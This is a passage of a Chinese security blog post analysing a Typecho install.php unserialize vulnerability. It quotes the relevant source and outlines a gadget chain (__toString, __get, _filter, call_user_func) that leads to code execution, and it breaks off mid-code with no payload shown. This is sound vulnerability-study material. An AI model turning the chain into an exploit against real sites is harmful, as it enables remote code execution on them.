<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
<title>Typecho 反序列化漏洞分析 - Threezh1&#39;s blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="Share learn & Share life.">



<meta name="keywords" content="Threezh1">



    <meta name="description" content="&amp;#x6F0F;&amp;#x6D1E;&amp;#x5206;&amp;#x6790;&amp;#xFF1A;&amp;#x601D;&amp;#x8DEF; &amp;#x5728;Typecho_Cookie::get()&amp;#x65B9;&amp;#x6CD5;&amp;#x4E2D;&amp;#x901A;&amp;#x8FC7;POST&amp;#x6216;&amp;#x8005;&amp;#x8BBE;&amp;#x7F6E;COOKIE&amp;#x7684;&amp;#x65B9;&amp;#x6CD5;&amp;#x8BBE;">
<meta name="keywords" content="反序列化,代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="Typecho 反序列化漏洞分析">
<meta property="og:url" content="http://yoursite.com/2018/01/01/Typecho反序列化漏洞分析/index.html">
<meta property="og:site_name" content="Threezh1&#39;s blog">
<meta property="og:description" content="&amp;#x6F0F;&amp;#x6D1E;&amp;#x5206;&amp;#x6790;&amp;#xFF1A;&amp;#x601D;&amp;#x8DEF; &amp;#x5728;Typecho_Cookie::get()&amp;#x65B9;&amp;#x6CD5;&amp;#x4E2D;&amp;#x901A;&amp;#x8FC7;POST&amp;#x6216;&amp;#x8005;&amp;#x8BBE;&amp;#x7F6E;COOKIE&amp;#x7684;&amp;#x65B9;&amp;#x6CD5;&amp;#x8BBE;">
<meta property="og:locale" content="Chinese">
<meta property="og:updated_time" content="2020-02-12T13:59:14.729Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Typecho 反序列化漏洞分析">
<meta name="twitter:description" content="&amp;#x6F0F;&amp;#x6D1E;&amp;#x5206;&amp;#x6790;&amp;#xFF1A;&amp;#x601D;&amp;#x8DEF; &amp;#x5728;Typecho_Cookie::get()&amp;#x65B9;&amp;#x6CD5;&amp;#x4E2D;&amp;#x901A;&amp;#x8FC7;POST&amp;#x6216;&amp;#x8005;&amp;#x8BBE;&amp;#x7F6E;COOKIE&amp;#x7684;&amp;#x65B9;&amp;#x6CD5;&amp;#x8BBE;">





<link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">

<link rel="stylesheet" href="/css/style.css">

<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    


</head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item " href="/archives">归档</a>
            
            <a class="navbar-item " href="/Projects">项目</a>
            
            <a class="navbar-item " href="/Life">生活</a>
            
            <a class="navbar-item " href="/Photography">摄影</a>
            
            <a class="navbar-item " href="/about">关于</a>
            
            <a class="navbar-item " href="http://119.3.219.188/">Threeday</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Search" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            
            <a class="navbar-item" title="GitHub" href="https://github.com/Threezh1">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            Typecho 反序列化漏洞分析
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            <time datetime="2018-01-01T04:00:00.000Z" itemprop="datePublished">Jan 1 2018</time>
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/技术文章/">技术文章</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            21 minutes read (About 3164 words)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <h2 id="&#x6F0F;&#x6D1E;&#x5206;&#x6790;&#xFF1A;"><a href="#&#x6F0F;&#x6D1E;&#x5206;&#x6790;&#xFF1A;" class="headerlink" title="&#x6F0F;&#x6D1E;&#x5206;&#x6790;&#xFF1A;"></a>&#x6F0F;&#x6D1E;&#x5206;&#x6790;&#xFF1A;</h2><h3 id="&#x601D;&#x8DEF;"><a href="#&#x601D;&#x8DEF;" class="headerlink" title="&#x601D;&#x8DEF;"></a>&#x601D;&#x8DEF;</h3><ol>
<li>&#x5728;Typecho_Cookie::get()&#x65B9;&#x6CD5;&#x4E2D;&#x901A;&#x8FC7;POST&#x6216;&#x8005;&#x8BBE;&#x7F6E;COOKIE&#x7684;&#x65B9;&#x6CD5;&#x8BBE;&#x7F6E;<em>_typecho_config</em>&#x8FDB;&#x884C;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x3002;</li>
<li>&#x5728;&#x5E8F;&#x5217;&#x5316;&#x5F53;&#x4E2D;&#x628A;adapter&#x8BBE;&#x7F6E;&#x4E3A;&#x4E00;&#x4E2A;&#x7C7B;&#xFF0C;&#x5BFC;&#x81F4;&#x9875;&#x9762;&#x6267;&#x884C;&#x4EE3;&#x7801;&#x65F6;&#x89E6;&#x53D1;<em>_toString()</em>&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x3002;</li>
<li>&#x5728;&#x5E8F;&#x5217;&#x5316;&#x5F53;&#x4E2D;&#x8BBE;&#x7F6E;$item&#x4EE4;&#x5176;&#x6CA1;&#x6709;screenName&#x5C5E;&#x6027;&#xFF0C;&#x5BFC;&#x81F4;&#x5728;&#x89E6;&#x53D1;<em>_toString()</em>&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x7684;&#x65F6;&#x5019;&#x89E6;&#x53D1;<em>_get()</em>&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x3002;</li>
<li>&#x901A;&#x8FC7;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x95F4;&#x63A5;&#x63A7;&#x5236;<em>$this-&gt;_filter</em>&#x7684;&#x503C;&#xFF0C;&#x5229;&#x7528;array_map(),call_user_func()&#x6267;&#x884C;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x3002;</li>
</ol>
<p><strong>&#x53EF;&#x77E5;&#xFF0C;&#x5728;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x7684;&#x8FC7;&#x7A0B;&#x4E2D;&#xFF0C;&#x6700;&#x7EC8;&#x662F;&#x8981;&#x5229;&#x7528;_toString(),_get()&#x7B49;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x6784;&#x9020;&#x4E00;&#x4E2A;POC&#x94FE;&#xFF0C;&#x6700;&#x7EC8;&#x6267;&#x884C;&#x6076;&#x610F;&#x4EE3;&#x7801;</strong><br><a id="more"></a></p>
<h3 id="PHP&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x53EF;&#x5229;&#x7528;&#x7684;&#x9B54;&#x672F;&#x65B9;&#x6CD5;"><a href="#PHP&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x53EF;&#x5229;&#x7528;&#x7684;&#x9B54;&#x672F;&#x65B9;&#x6CD5;" class="headerlink" title="PHP&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x53EF;&#x5229;&#x7528;&#x7684;&#x9B54;&#x672F;&#x65B9;&#x6CD5;"></a>PHP&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;&#x53EF;&#x5229;&#x7528;&#x7684;&#x9B54;&#x672F;&#x65B9;&#x6CD5;</h3><pre><code>- __wakeup() //&#x4F7F;&#x7528;unserialize&#x65F6;&#x89E6;&#x53D1;
- __sleep() //&#x4F7F;&#x7528;serialize&#x65F6;&#x89E6;&#x53D1;
- __destruct() //&#x5BF9;&#x8C61;&#x88AB;&#x9500;&#x6BC1;&#x65F6;&#x89E6;&#x53D1;
- __call() //&#x5728;&#x5BF9;&#x8C61;&#x4E0A;&#x4E0B;&#x6587;&#x4E2D;&#x8C03;&#x7528;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x7684;&#x65B9;&#x6CD5;&#x65F6;&#x89E6;&#x53D1;
- __callStatic() //&#x5728;&#x9759;&#x6001;&#x4E0A;&#x4E0B;&#x6587;&#x4E2D;&#x8C03;&#x7528;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x7684;&#x65B9;&#x6CD5;&#x65F6;&#x89E6;&#x53D1;
- __get() //&#x7528;&#x4E8E;&#x4ECE;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x7684;&#x5C5E;&#x6027;&#x8BFB;&#x53D6;&#x6570;&#x636E;
- __set() //&#x7528;&#x4E8E;&#x5C06;&#x6570;&#x636E;&#x5199;&#x5165;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x7684;&#x5C5E;&#x6027;
- __isset() //&#x5728;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x7684;&#x5C5E;&#x6027;&#x4E0A;&#x8C03;&#x7528;isset()&#x6216;empty()&#x89E6;&#x53D1;
- __unset() //&#x5728;&#x4E0D;&#x53EF;&#x8BBF;&#x95EE;&#x7684;&#x5C5E;&#x6027;&#x4E0A;&#x4F7F;&#x7528;unset()&#x65F6;&#x89E6;&#x53D1;
- __toString() //&#x628A;&#x7C7B;&#x5F53;&#x4F5C;&#x5B57;&#x7B26;&#x4E32;&#x4F7F;&#x7528;&#x65F6;&#x89E6;&#x53D1;
- __invoke() //&#x5F53;&#x811A;&#x672C;&#x5C1D;&#x8BD5;&#x5C06;&#x5BF9;&#x8C61;&#x8C03;&#x7528;&#x4E3A;&#x51FD;&#x6570;&#x65F6;&#x89E6;&#x53D1;
</code></pre><p>&#x6F0F;&#x6D1E;&#x7684;&#x5165;&#x53E3;&#x70B9;&#x5728;install.php&#xFF0C;&#x8FDB;&#x5165;install.php&#x9996;&#x5148;&#x7ECF;&#x8FC7;&#x4E24;&#x4E2A;&#x5224;&#x65AD;&#xFF01;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-comment">//&#x5224;&#x65AD;&#x662F;&#x5426;&#x5DF2;&#x7ECF;&#x5B89;&#x88C5;</span></span><br><span class="line"><span class="hljs-keyword">if</span> (!<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">&apos;finish&apos;</span>]) &amp;&amp; file_exists(__TYPECHO_ROOT_DIR__ . <span class="hljs-string">&apos;/config.inc.php&apos;</span>) &amp;&amp; <span class="hljs-keyword">empty</span>($_SESSION[<span class="hljs-string">&apos;typecho&apos;</span>])) {</span><br><span class="line">    <span class="hljs-keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="hljs-comment">// &#x6321;&#x6389;&#x53EF;&#x80FD;&#x7684;&#x8DE8;&#x7AD9;&#x8BF7;&#x6C42;</span></span><br><span class="line"><span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>($_GET) || !<span class="hljs-keyword">empty</span>($_POST)) {</span><br><span class="line">    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>($_SERVER[<span class="hljs-string">&apos;HTTP_REFERER&apos;</span>])) {</span><br><span class="line">        <span class="hljs-keyword">exit</span>;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    $parts = parse_url($_SERVER[<span class="hljs-string">&apos;HTTP_REFERER&apos;</span>]);</span><br><span class="line">	<span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>($parts[<span class="hljs-string">&apos;port&apos;</span>]) &amp;&amp; $parts[<span class="hljs-string">&apos;port&apos;</span>] != <span class="hljs-number">80</span>) {</span><br><span class="line">        $parts[<span class="hljs-string">&apos;host&apos;</span>] = <span class="hljs-string">&quot;{$parts[&apos;host&apos;]}:{$parts[&apos;port&apos;]}&quot;</span>;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>($parts[<span class="hljs-string">&apos;host&apos;</span>]) || $_SERVER[<span class="hljs-string">&apos;HTTP_HOST&apos;</span>] != $parts[<span class="hljs-string">&apos;host&apos;</span>]) {</span><br><span class="line">        <span class="hljs-keyword">exit</span>;</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="&#x6EE1;&#x8DB3;&#x7684;&#x6761;&#x4EF6;&#x4E3A;&#xFF1A;"><a href="#&#x6EE1;&#x8DB3;&#x7684;&#x6761;&#x4EF6;&#x4E3A;&#xFF1A;" class="headerlink" title="&#x6EE1;&#x8DB3;&#x7684;&#x6761;&#x4EF6;&#x4E3A;&#xFF1A;"></a>&#x6EE1;&#x8DB3;&#x7684;&#x6761;&#x4EF6;&#x4E3A;&#xFF1A;</h3><ul>
<li>GET&#x4E2D;&#x7684;finishi&#x53C2;&#x6570;&#x4E0D;&#x80FD;&#x4E3A;&#x7A7A;&#x3002;</li>
<li>referer&#x4E3A;&#x7AD9;&#x5185;url</li>
</ul>
<h3 id="&#x5206;&#x6790;&#x8FC7;&#x7A0B;&#xFF1A;"><a href="#&#x5206;&#x6790;&#x8FC7;&#x7A0B;&#xFF1A;" class="headerlink" title="&#x5206;&#x6790;&#x8FC7;&#x7A0B;&#xFF1A;"></a>&#x5206;&#x6790;&#x8FC7;&#x7A0B;&#xFF1A;</h3><figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">$config = unserialize(base64_decode(Typecho_Cookie::get(<span class="hljs-string">&apos;__typecho_config&apos;</span>)));</span><br><span class="line">Typecho_Cookie::delete(<span class="hljs-string">&apos;__typecho_config&apos;</span>);</span><br><span class="line">$db = <span class="hljs-keyword">new</span> Typecho_Db($config[<span class="hljs-string">&apos;adapter&apos;</span>], $config[<span class="hljs-string">&apos;prefix&apos;</span>]);</span><br><span class="line">$db-&gt;addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);</span><br><span class="line">Typecho_Db::set($db);</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x8FD9;&#x91CC;&#x6709;&#x4E2A;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x51FD;&#x6570;&#xFF1A;unserialize()</p>
<p>&#x5176;&#x4E2D;&#x662F;&#x901A;&#x8FC7;<em>Typecho_Cookie::get()</em>&#x65B9;&#x6CD5;&#x83B7;&#x53D6;&#x7684;&#x5E8F;&#x5217;&#x5316;&#x7684;&#x5BF9;&#x8C61;&#xFF0C;&#x627E;&#x5230;&#x8FD9;&#x4E2A;&#x65B9;&#x6CD5;&#x7684;&#x7F51;&#x9875;&#xFF0C;&#x4E3A;<em>www\var\Typecho\Cookie.php</em></p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span><span class="hljs-params">($key, $default = NULL)</span></span></span><br><span class="line"><span class="hljs-function"></span>{</span><br><span class="line">    $key = <span class="hljs-keyword">self</span>::$_prefix . $key;</span><br><span class="line">    $value = <span class="hljs-keyword">isset</span>($_COOKIE[$key]) ? $_COOKIE[$key] : (<span class="hljs-keyword">isset</span>($_POST[$key]) ? $_POST[$key] : $default);</span><br><span class="line">    <span class="hljs-keyword">return</span> is_array($value) ? $default : $value;</span><br><span class="line">}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x4ECE;&#x7B2C;&#x56DB;&#x884C;&#x547D;&#x4EE4;&#x53EF;&#x77E5;&#xFF0C;typecho_config&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x8BBE;&#x7F6E;COOKIE&#x7684;&#x65B9;&#x5F0F;&#x6216;&#x8005;POST&#x7684;&#x65B9;&#x5F0F;&#x8F93;&#x5165;&#xFF01;</p>
<p>&#x518D;&#x7EE7;&#x7EED;&#x770B;&#x524D;&#x9762;&#x7684;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x7684;&#x4EE3;&#x7801;&#xFF0C;&#x7B2C;&#x56DB;&#x884C;&#x5B9A;&#x4E49;&#x4E86;&#x4E00;&#x4E2A;&#x65B0;&#x7684;&#x53D8;&#x91CF;&#xFF01;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">	$db = <span class="hljs-keyword">new</span> Typecho_Db($config[<span class="hljs-string">&apos;adapter&apos;</span>], $config[<span class="hljs-string">&apos;prefix&apos;</span>]);</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x53EF;&#x77E5;&#xFF0C;&#x8FD9;&#x91CC;&#x5B9E;&#x4F8B;&#x5316;&#x4E86;&#x4E00;&#x4E2A;&#x5BF9;&#x8C61; <em>Typecho_Db</em> &#x627E;&#x5230;&#x8FD9;&#x4E2A;&#x7C7B;&#x6240;&#x5728;&#x7684;&#x9875;&#x9762;&#x4E0E;&#x4EE3;&#x7801;&#xFF01;&#x4E3A;<em>www\var\Typecho\Db.php</em></p>
<p>&#x8FD9;&#x91CC;&#x6709;&#x4E00;&#x4E2A;Typecho_Db&#x7C7B;&#x7684;&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($adapterName, $prefix = <span class="hljs-string">&apos;typecho_&apos;</span>)</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-comment">/** &#x83B7;&#x53D6;&#x9002;&#x914D;&#x5668;&#x540D;&#x79F0; */</span></span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_adapterName = $adapterName;</span><br><span class="line"></span><br><span class="line">        <span class="hljs-comment">/** &#x6570;&#x636E;&#x5E93;&#x9002;&#x914D;&#x5668; */</span></span><br><span class="line">        $adapterName = <span class="hljs-string">&apos;Typecho_Db_Adapter_&apos;</span> . $adapterName;</span><br><span class="line"></span><br><span class="line">        <span class="hljs-keyword">if</span> (!call_user_func(<span class="hljs-keyword">array</span>($adapterName, <span class="hljs-string">&apos;isAvailable&apos;</span>))) {</span><br><span class="line">            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> Typecho_Db_Exception(<span class="hljs-string">&quot;Adapter {$adapterName} is not available&quot;</span>);</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_prefix = $prefix;</span><br><span class="line"></span><br><span class="line">        <span class="hljs-comment">/** &#x521D;&#x59CB;&#x5316;&#x5185;&#x90E8;&#x53D8;&#x91CF; */</span></span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_pool = <span class="hljs-keyword">array</span>();</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_connectedPool = <span class="hljs-keyword">array</span>();</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_config = <span class="hljs-keyword">array</span>();</span><br><span class="line"></span><br><span class="line">        <span class="hljs-comment">//&#x5B9E;&#x4F8B;&#x5316;&#x9002;&#x914D;&#x5668;&#x5BF9;&#x8C61;</span></span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_adapter = <span class="hljs-keyword">new</span> $adapterName();</span><br><span class="line">    }</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x4ECE;&#x4EE3;&#x7801;&#x53EF;&#x77E5;&#xFF0C;<em>$adapterName = &#x2018;Typecho_Db_Adapter_&#x2019; . $adapterName;</em> &#x4F1A;&#x5C06;$config[&#x2018;adapter&#x2019;]&#x6240;&#x8D4B;&#x503C;&#x7684;$adapterName&#x4E0E;&#x4E00;&#x4E2A;&#x5B57;&#x7B26;&#x4E32;&#x76F8;&#x52A0;&#xFF01;</p>
<p>&#x5982;&#x679C;&#x901A;&#x8FC7;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#xFF0C;&#x5C06;adapter&#x8BBE;&#x7F6E;&#x4E3A;&#x4E00;&#x4E2A;&#x7C7B;&#xFF0C;&#x90A3;&#x4E48;&#x8FD9;&#x4E2A;&#x547D;&#x4EE4;&#x5C31;&#x4F1A;&#x89E6;&#x53D1;<strong>__toString()</strong>&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#xFF01;</p>
<p>&#x7528;&#x5168;&#x5C40;&#x641C;&#x7D22;&#x641C;&#x7D22;&#x6240;&#x6709;&#x53EF;&#x5229;&#x7528;__toString()&#x65B9;&#x6CD5;&#x7684;&#x5730;&#x65B9;&#xFF01;</p>
<p>&#x5B58;&#x5728;&#x4E8E;&#xFF1A;<em>www\var\Typecho\Feed.php</em>  &#x5728;__toString()&#x7C7B;&#x4E0B;&#xFF0C;&#x5B58;&#x5728;&#x8FD9;&#x4E00;&#x6BB5;&#x4EE3;&#x7801;&#xFF01;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">    <span class="hljs-keyword">foreach</span> (<span class="hljs-keyword">$this</span>-&gt;_items <span class="hljs-keyword">as</span> $item) {</span><br><span class="line">	    $content .= <span class="hljs-string">&apos;&lt;item&gt;&apos;</span> . <span class="hljs-keyword">self</span>::EOL;</span><br><span class="line">	    $content .= <span class="hljs-string">&apos;&lt;title&gt;&apos;</span> . htmlspecialchars($item[<span class="hljs-string">&apos;title&apos;</span>]) . <span class="hljs-string">&apos;&lt;/title&gt;&apos;</span> . <span class="hljs-keyword">self</span>::EOL;</span><br><span class="line">	    $content .= <span class="hljs-string">&apos;&lt;link&gt;&apos;</span> . $item[<span class="hljs-string">&apos;link&apos;</span>] . <span class="hljs-string">&apos;&lt;/link&gt;&apos;</span> . <span class="hljs-keyword">self</span>::EOL;</span><br><span class="line">	    $content .= <span class="hljs-string">&apos;&lt;guid&gt;&apos;</span> . $item[<span class="hljs-string">&apos;link&apos;</span>] . <span class="hljs-string">&apos;&lt;/guid&gt;&apos;</span> . <span class="hljs-keyword">self</span>::EOL;</span><br><span class="line">	    $content .= <span class="hljs-string">&apos;&lt;pubDate&gt;&apos;</span> . <span class="hljs-keyword">$this</span>-&gt;dateFormat($item[<span class="hljs-string">&apos;date&apos;</span>]) . <span class="hljs-string">&apos;&lt;/pubDate&gt;&apos;</span> . <span class="hljs-keyword">self</span>::EOL;</span><br><span class="line">	    $content .= <span class="hljs-string">&apos;&lt;dc:creator&gt;&apos;</span> . htmlspecialchars($item[<span class="hljs-string">&apos;author&apos;</span>]-&gt;screenName) . <span class="hljs-string">&apos;&lt;/dc:creator&gt;&apos;</span> . <span class="hljs-keyword">self</span>::EOL;</span><br><span class="line">	    ....</span><br><span class="line">	}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x9875;&#x9762;&#x4E4B;&#x524D;&#x7684;&#x4EE3;&#x7801;&#xFF1A;</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">	<span class="hljs-keyword">private</span> $_items = <span class="hljs-keyword">array</span>();</span><br><span class="line">	....</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">addItem</span><span class="hljs-params">(array $item)</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">$this</span>-&gt;_items[] = $item;</span><br><span class="line">    }</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>&#x7531;&#x4E0A;&#x4E0A;&#x65B9;&#x7684;&#x4EE3;&#x7801;&#x6B64;&#x9875;&#x9762;&#x524D;&#x9762;&#x7684;&#x4EE3;&#x7801;&#x53EF;&#x77E5;&#xFF0C; $this-&gt;items&#x662F;Typecho_Feed&#x662F;&#x7684;&#x4E00;&#x4E2A;&#x79C1;&#x6709;&#x5C5E;&#x6027;&#x3002;&#xFF08;&#x5E76;&#x4E14;&#x662F;&#x4E00;&#x4E2A;&#x6570;&#x7EC4;&#xFF09;$item&#x662F;&#x7531;$this-&gt;items foreach&#x51FA;&#x6765;&#x7684;&#x3002;</p>
<p>&#x5728;&#x6700;&#x540E;&#x4E00;&#x884C;&#xFF0C;&#x6267;&#x884C;&#x4E86;$item[&#x2018;author&#x2019;]-&gt;screenName&#x3002;&#x901A;&#x8FC7;$item[&#x2018;author&#x2019;]&#x8C03;&#x7528;&#x4E86;screenName&#x5C5E;&#x6027;&#x3002;</p>
<p>&#x5982;&#x679C;&#x6211;&#x4EEC;&#x4E4B;&#x524D;&#x901A;&#x8FC7;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x5C06;$item[&#x2018;author&#x2019;]&#x8BBE;&#x7F6E;&#x4E3A;&#x6CA1;&#x6709;screenName&#x5C5E;&#x6027;&#xFF0C;&#x90A3;&#x4E48;&#x5728;&#x6267;&#x884C;$item[&#x2018;author&#x2019;]-&gt;screenName&#x4EE3;&#x7801;&#x65F6;&#x5C31;&#x4F1A;&#x81EA;&#x52A8;&#x8C03;&#x7528;<strong>_get()</strong>&#x9B54;&#x672F;&#x65B9;&#x6CD5;&#x3002;</p>
<p>&#x518D;&#x7528;&#x5168;&#x5C40;&#x641C;&#x7D22;&#x7684;&#x65B9;&#x6CD5;&#x641C;&#x7D22;_get() &#x5B58;&#x5728;&#x4E8E;&#xFF1A;<em>www\var\Typecho\Request.php</em></p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line">	...</span><br><span class="line">    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span><span class="hljs-params">($key)</span></span></span><br><span class="line"><span class="hljs-function">    </span>{</span><br><span class="line">        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;get($key);</span><br><span class="line">    }</span><br><span class="line">    ...</span><br><span class="line"><span 